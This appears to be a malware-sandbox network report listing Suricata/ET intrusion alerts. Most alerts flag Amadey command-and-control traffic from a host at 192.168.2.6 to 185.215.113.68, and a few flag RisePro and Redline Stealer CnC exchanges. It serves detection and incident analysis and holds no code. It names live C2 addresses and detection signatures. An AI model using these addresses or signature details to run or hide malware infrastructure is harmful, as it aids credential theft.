ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850502802856147 01/18/24-00:37:52.563033
SID:	2856147
Source Port:	50502
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849956802856147 01/18/24-00:35:08.547123
SID:	2856147
Source Port:	49956
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850284802856147 01/18/24-00:35:54.718511
SID:	2856147
Source Port:	50284
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850367802856147 01/18/24-00:36:34.850719
SID:	2856147
Source Port:	50367
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850389802856147 01/18/24-00:36:46.828368
SID:	2856147
Source Port:	50389
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850098802856147 01/18/24-00:35:22.881019
SID:	2856147
Source Port:	50098
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850135802856147 01/18/24-00:35:28.719889
SID:	2856147
Source Port:	50135
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850432802856147 01/18/24-00:37:11.329279
SID:	2856147
Source Port:	50432
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850213802856147 01/18/24-00:35:41.382295
SID:	2856147
Source Port:	50213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850241802856147 01/18/24-00:35:45.280965
SID:	2856147
Source Port:	50241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850460802856147 01/18/24-00:37:27.872636
SID:	2856147
Source Port:	50460
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850359802856147 01/18/24-00:36:30.520409
SID:	2856147
Source Port:	50359
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850490802856147 01/18/24-00:37:45.928658
SID:	2856147
Source Port:	50490
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850313802856147 01/18/24-00:36:04.156266
SID:	2856147
Source Port:	50313
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850395802856147 01/18/24-00:36:51.146176
SID:	2856147
Source Port:	50395
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850532802856147 01/18/24-00:38:09.545002
SID:	2856147
Source Port:	50532
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850534802856147 01/18/24-00:38:10.624510
SID:	2856147
Source Port:	50534
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 193.233.132.62 - Destination IP: 192.168.2.6

Timestamp:	193.233.132.62192.168.2.650500496992046266 01/18/24-00:34:13.866339
SID:	2046266
Source Port:	50500
Destination Port:	49699
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850436802856147 01/18/24-00:37:13.542791
SID:	2856147
Source Port:	50436
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850525802856147 01/18/24-00:38:06.302687
SID:	2856147
Source Port:	50525
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850427802856147 01/18/24-00:37:09.134860
SID:	2856147
Source Port:	50427
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850295802856147 01/18/24-00:35:57.219509
SID:	2856147
Source Port:	50295
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850347802856147 01/18/24-00:36:22.870848
SID:	2856147
Source Port:	50347
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850004802856147 01/18/24-00:35:16.092043
SID:	2856147
Source Port:	50004
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850130802856147 01/18/24-00:35:27.019531
SID:	2856147
Source Port:	50130
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850172802856147 01/18/24-00:35:37.196114
SID:	2856147
Source Port:	50172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850341802856147 01/18/24-00:36:18.907981
SID:	2856147
Source Port:	50341
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850430802856147 01/18/24-00:37:10.219315
SID:	2856147
Source Port:	50430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850357802856147 01/18/24-00:36:29.439677
SID:	2856147
Source Port:	50357
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850576802856147 01/18/24-00:38:29.325052
SID:	2856147
Source Port:	50576
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Response M1 - Source IP: 185.215.113.68 - Destination IP: 192.168.2.6

Timestamp:	185.215.113.68192.168.2.680497952856122 01/18/24-00:34:53.770773
SID:	2856122
Source Port:	80
Destination Port:	49795
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850446802856147 01/18/24-00:37:19.116493
SID:	2856147
Source Port:	50446
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850553802856147 01/18/24-00:38:18.481445
SID:	2856147
Source Port:	50553
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850506802856147 01/18/24-00:37:54.758157
SID:	2856147
Source Port:	50506
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850398802856147 01/18/24-00:36:53.190741
SID:	2856147
Source Port:	50398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850210802856147 01/18/24-00:35:40.555078
SID:	2856147
Source Port:	50210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850464802856147 01/18/24-00:37:30.069199
SID:	2856147
Source Port:	50464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850417802856147 01/18/24-00:37:03.062809
SID:	2856147
Source Port:	50417
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850375802856147 01/18/24-00:36:39.189599
SID:	2856147
Source Port:	50375
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850055802856147 01/18/24-00:35:20.362569
SID:	2856147
Source Port:	50055
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850178802856147 01/18/24-00:35:38.036289
SID:	2856147
Source Port:	50178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850137802856147 01/18/24-00:35:29.540949
SID:	2856147
Source Port:	50137
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849957802856147 01/18/24-00:35:09.378520
SID:	2856147
Source Port:	49957
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850411802856147 01/18/24-00:36:59.814208
SID:	2856147
Source Port:	50411
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850500802856147 01/18/24-00:37:51.456957
SID:	2856147
Source Port:	50500
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850468802856147 01/18/24-00:37:32.278388
SID:	2856147
Source Port:	50468
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850566802856147 01/18/24-00:38:24.996247
SID:	2856147
Source Port:	50566
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850474802856147 01/18/24-00:37:36.609801
SID:	2856147
Source Port:	50474
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850379802856147 01/18/24-00:36:41.378767
SID:	2856147
Source Port:	50379
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850391802856147 01/18/24-00:36:47.928229
SID:	2856147
Source Port:	50391
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850058802856147 01/18/24-00:35:21.217513
SID:	2856147
Source Port:	50058
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850140802856147 01/18/24-00:35:30.378117
SID:	2856147
Source Port:	50140
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850385802856147 01/18/24-00:36:44.646931
SID:	2856147
Source Port:	50385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850572802856147 01/18/24-00:38:27.171975
SID:	2856147
Source Port:	50572
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850480802856147 01/18/24-00:37:39.897947
SID:	2856147
Source Port:	50480
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849938802856147 01/18/24-00:35:06.030124
SID:	2856147
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850325802856147 01/18/24-00:36:13.006017
SID:	2856147
Source Port:	50325
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850112802856147 01/18/24-00:35:23.722106
SID:	2856147
Source Port:	50112
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850538802856147 01/18/24-00:38:12.802321
SID:	2856147
Source Port:	50538
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850496802856147 01/18/24-00:37:49.262655
SID:	2856147
Source Port:	50496
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850319802856147 01/18/24-00:36:09.241893
SID:	2856147
Source Port:	50319
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850147802856147 01/18/24-00:35:32.961050
SID:	2856147
Source Port:	50147
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849877802856147 01/18/24-00:35:00.737051
SID:	2856147
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849966802856147 01/18/24-00:35:11.228867
SID:	2856147
Source Port:	49966
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850550802856147 01/18/24-00:38:17.407758
SID:	2856147
Source Port:	50550
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850494802856147 01/18/24-00:37:48.149370
SID:	2856147
Source Port:	50494
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850255802856147 01/18/24-00:35:46.949937
SID:	2856147
Source Port:	50255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850448802856147 01/18/24-00:37:20.227683
SID:	2856147
Source Port:	50448
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850546802856147 01/18/24-00:38:16.300648
SID:	2856147
Source Port:	50546
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850353802856147 01/18/24-00:36:27.272257
SID:	2856147
Source Port:	50353
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849955802856147 01/18/24-00:35:07.715429
SID:	2856147
Source Port:	49955
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850476802856147 01/18/24-00:37:37.700684
SID:	2856147
Source Port:	50476
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.6 - Destination IP: 193.233.132.62

Timestamp:	192.168.2.6193.233.132.6249699505002046269 01/18/24-00:34:19.912622
SID:	2046269
Source Port:	49699
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850574802856147 01/18/24-00:38:28.229932
SID:	2856147
Source Port:	50574
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849795802856147 01/18/24-00:34:53.279674
SID:	2856147
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850298802856147 01/18/24-00:35:58.070776
SID:	2856147
Source Port:	50298
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849988802856147 01/18/24-00:35:15.202073
SID:	2856147
Source Port:	49988
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850219802856147 01/18/24-00:35:42.212419
SID:	2856147
Source Port:	50219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850317802856147 01/18/24-00:36:07.530352
SID:	2856147
Source Port:	50317
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850415802856147 01/18/24-00:37:01.978759
SID:	2856147
Source Port:	50415
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850513802856147 01/18/24-00:37:58.086544
SID:	2856147
Source Port:	50513
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850423802856147 01/18/24-00:37:06.967075
SID:	2856147
Source Port:	50423
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6849922802856147 01/18/24-00:35:05.163772
SID:	2856147
Source Port:	49922
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 194.33.191.102 - Destination IP: 192.168.2.6

Timestamp:	194.33.191.102192.168.2.621751498502043234 01/18/24-00:34:58.841739
SID:	2043234
Source Port:	21751
Destination Port:	49850
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850400802856147 01/18/24-00:36:54.281221
SID:	2856147
Source Port:	50400
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850458802856147 01/18/24-00:37:26.791570
SID:	2856147
Source Port:	50458
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850523802856147 01/18/24-00:38:05.191706
SID:	2856147
Source Port:	50523
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850381802856147 01/18/24-00:36:42.440554
SID:	2856147
Source Port:	50381
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850327802856147 01/18/24-00:36:14.946267
SID:	2856147
Source Port:	50327
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850363802856147 01/18/24-00:36:32.698001
SID:	2856147
Source Port:	50363
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850564802856147 01/18/24-00:38:23.919448
SID:	2856147
Source Port:	50564
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850149802856147 01/18/24-00:35:33.792720
SID:	2856147
Source Port:	50149
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850345802856147 01/18/24-00:36:21.171855
SID:	2856147
Source Port:	50345
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850309802856147 01/18/24-00:36:02.282469
SID:	2856147
Source Port:	50309
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850082802856147 01/18/24-00:35:22.059111
SID:	2856147
Source Port:	50082
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850024802856147 01/18/24-00:35:18.693763
SID:	2856147
Source Port:	50024
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850122802856147 01/18/24-00:35:25.369339
SID:	2856147
Source Port:	50122
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850260802856147 01/18/24-00:35:48.934538
SID:	2856147
Source Port:	50260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850165802856147 01/18/24-00:35:36.349214
SID:	2856147
Source Port:	50165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

Timestamp:	192.168.2.6185.215.113.6850315802856147 01/18/24-00:36:05.848499
SID:	2856147
Source Port:	50315
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.68

